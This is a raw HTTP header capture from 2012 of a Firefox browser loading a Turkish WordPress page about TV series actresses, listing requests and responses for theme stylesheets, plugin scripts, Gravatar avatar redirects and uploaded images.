GET /wp-content/themes/osman/custom.css HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/wp-content/themes/osman/style.css
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Date: Wed, 14 Nov 2012 13:32:29 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;16-4f19b6af-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:47:11 GMT
Content-Length: 22
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:29 GMT
GET /wp-content/plugins/lightbox/js/effects.js HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;7ce1-49cbe946-0&quot;
Last-Modified: Thu, 26 Mar 2009 20:44:54 GMT
Content-Length: 8524
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/plugins/lightbox/js/prototype.js HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;46b9-49cbe947-0&quot;
Last-Modified: Thu, 26 Mar 2009 20:44:55 GMT
Content-Length: 8826
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/plugins/lightbox/css/lightbox.css HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;674-49cbe93f-0&quot;
Last-Modified: Thu, 26 Mar 2009 20:44:47 GMT
Content-Length: 699
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/plugins/wp-pagenavi/pagenavi-css.css HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;6d9-4a0fe95a-0&quot;
Last-Modified: Sun, 17 May 2009 10:39:22 GMT
Content-Length: 470
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-includes/js/tw-sack.js?ver=1.6.1 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;e23-4f19b497-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:38:15 GMT
Content-Length: 1316
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/plugins/lightbox/js/lightbox.js HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;3ff1-49cbe946-0&quot;
Last-Modified: Thu, 26 Mar 2009 20:44:54 GMT
Content-Length: 4625
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /avatar/ded8db39f19fd7252c86abfee1a95fde?s=60&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&r=G HTTP/1.1

Host: 1.gravatar.com
GET /avatar/ded8db39f19fd7252c86abfee1a95fde?s=60&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://1.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=60
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2671129492
Content-Length: 0
GET /wp-includes/js/jquery/jquery.form.js?ver=2.73 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;2b6b-4f19b4bd-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:38:53 GMT
Content-Length: 4700
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /avatar/ad516503a11cd5ca435acc9bb6523536?s=60 HTTP/1.1

Host: 1.gravatar.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Content-Disposition: inline; filename=&quot;ad516503a11cd5ca435acc9bb6523536.png&quot;
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Sat, 01 Mar 2008 02:44:06 GMT
Server: ECS (arn/46E6)
Source-Age: 2414
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1278332898 1277079253
Content-Length: 1497
GET /wp-content/plugins/contact-form-7/contact-form-7.js?ver=2.0.6 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;e36-4aec2428-0&quot;
Last-Modified: Sat, 31 Oct 2009 11:48:56 GMT
Content-Length: 1282
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /avatar/f2bb1d22227bf5b66e3aff2acc3abb16?s=60&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&r=G HTTP/1.1

Host: 1.gravatar.com
GET /avatar/f2bb1d22227bf5b66e3aff2acc3abb16?s=60&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://1.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=60
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 386712405
Content-Length: 0
GET /wp-content/plugins/wp-polls/polls-css.css?ver=2.40 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: text/css
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;a9e-4a38144c-0&quot;
Last-Modified: Tue, 16 Jun 2009 21:53:16 GMT
Content-Length: 789
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/plugins/wp-polls/polls-js-packed.js?ver=2.40 HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: application/javascript
Content-Encoding: gzip
Vary: Accept-Encoding, User-Agent
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
Etag: &quot;a82-4a38144d-0&quot;
Last-Modified: Tue, 16 Jun 2009 21:53:17 GMT
Content-Length: 1218
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /avatar/1c8ffc9569c692b14e62caf883a52337?s=60&d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&r=G HTTP/1.1

Host: 1.gravatar.com
GET /avatar/1c8ffc9569c692b14e62caf883a52337?s=60&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://1.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=60
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2671129514
Content-Length: 0
GET /avatar/0d118858bc255b7c246b5a96f0a2ac75?s=60&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&r=G HTTP/1.1

Host: 0.gravatar.com
GET /avatar/0d118858bc255b7c246b5a96f0a2ac75?s=60&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=60
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2070785938
Content-Length: 0
GET /avatar/254a7167937498887908e62d33ec19d0?s=60&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&r=G HTTP/1.1

Host: 0.gravatar.com
GET /avatar/254a7167937498887908e62d33ec19d0?s=60&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=60
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2671129524
Content-Length: 0
GET /avatar/6b491bf8a174141fbb1d0216914bb6fe?s=60&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&r=G HTTP/1.1

Host: 0.gravatar.com
GET /avatar/6b491bf8a174141fbb1d0216914bb6fe?s=60&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=60
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 3990579646
Content-Length: 0
GET /wp-content/themes/osman/images/anasyf.gif HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;45f-4f19b702-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:48:34 GMT
Content-Length: 1119
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /avatar/eac41c11984f30ce1092780011d46b78?s=60&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&r=G HTTP/1.1

Host: 0.gravatar.com
GET /avatar/eac41c11984f30ce1092780011d46b78?s=60&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=60
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 2246485731
Content-Length: 0
GET /wp-content/themes/osman/css/skins/images/red_logo.png HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/png
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;294d-4f19b6c0-0&quot;
Last-Modified: Fri, 20 Jan 2012 18:47:28 GMT
Content-Length: 10573
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /avatar/68bc0fefd3d5baa71c8e2a6e8cb9b778?s=60&d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&r=G HTTP/1.1

Host: 0.gravatar.com
GET /avatar/68bc0fefd3d5baa71c8e2a6e8cb9b778?s=60&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D60&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Cache-Control: max-age=300
Date: Wed, 14 Nov 2012 13:32:31 GMT
Expires: Wed, 14 Nov 2012 13:37:31 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Location: http://0.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536?s=60
Server: nginx
Source-Age: 0
Via: 1.1 varnish
X-Varnish: 386712514
Content-Length: 0
GET /wp-content/uploads/tuba3.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;4fed-4aa618ee-0&quot;
Last-Modified: Tue, 08 Sep 2009 08:42:22 GMT
Content-Length: 20461
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/tuba2.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;44a4-4aa618bc-0&quot;
Last-Modified: Tue, 08 Sep 2009 08:41:32 GMT
Content-Length: 17572
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/sedef2.jpg HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Wed, 14 Nov 2012 13:32:30 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Etag: &quot;5f10-4aa61b22-0&quot;
Last-Modified: Tue, 08 Sep 2009 08:51:46 GMT
Content-Length: 24336
Vary: User-Agent
Cache-Control: max-age=604800
Expires: Wed, 21 Nov 2012 13:32:30 GMT
GET /wp-content/uploads/sedef1.JPG HTTP/1.1

Host: www.osmanoguz.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.osmanoguz.net/dizi-guzelleri-televizyonun-guzel-yuzleri.html
Cookie: sayfa_sayac_okunan=YToxOntpOjA7aToxNTQ3O30%3D
